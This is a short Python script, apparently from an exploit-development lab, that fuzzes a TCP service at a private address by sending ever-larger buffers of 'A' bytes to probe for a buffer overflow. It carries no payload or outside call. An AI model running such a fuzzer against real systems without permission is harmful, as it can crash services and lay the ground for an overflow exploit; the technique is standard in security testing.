#!/usr/bin/env python
import socket

buffer_init = 'A' * 1024
buffer_current = buffer_init

max_buffer_size = 10240

while len(buffer_current) <= max_buffer_size:
    buffer_current += buffer_init
    #print "Fuzzing with %s bytes" % len(buffer_current)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('192.168.1.102', 32023))
    s.send(buffer_current)
    print(s.recv(1024))
    s.close()

